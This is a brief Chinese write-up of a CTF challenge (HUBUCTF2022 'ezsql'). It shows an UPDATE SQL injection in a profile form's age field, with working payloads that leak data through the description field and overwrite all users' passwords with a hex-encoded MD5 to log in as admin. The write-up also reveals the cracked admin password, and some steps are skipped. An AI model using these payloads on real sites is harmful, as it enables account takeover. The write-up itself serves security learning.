HUBUCTF2022-ezsql-wp
题目描述:好想知道admin的密码呜呜呜~
UPDATE注入
注册登入发现可以更新个人信息 其中age字段存在update注入,可通过描述字段查看所需信息
1 | 1. nickname=hhh&age=23, description=(select 1)%23 // 1 |
修改password
1 | 6. nickname=hhh&age=23, password=0x3230326362393632616335393037356239363462303731353264323334623730%23 // 0x32...30 == hex(md5('123')) |
登录成功
username: admin password: 123
这里description是被覆盖过的,因为前面执行 [5] 的时候是对所有用户进行操作,使得description为password
可以看到description: 5a64edabc9358c603103053a3c600a88 爆破可得原始密码为 iamcool
需要重开环境直接 1.修改密码[6]再登录 2.iamcool登录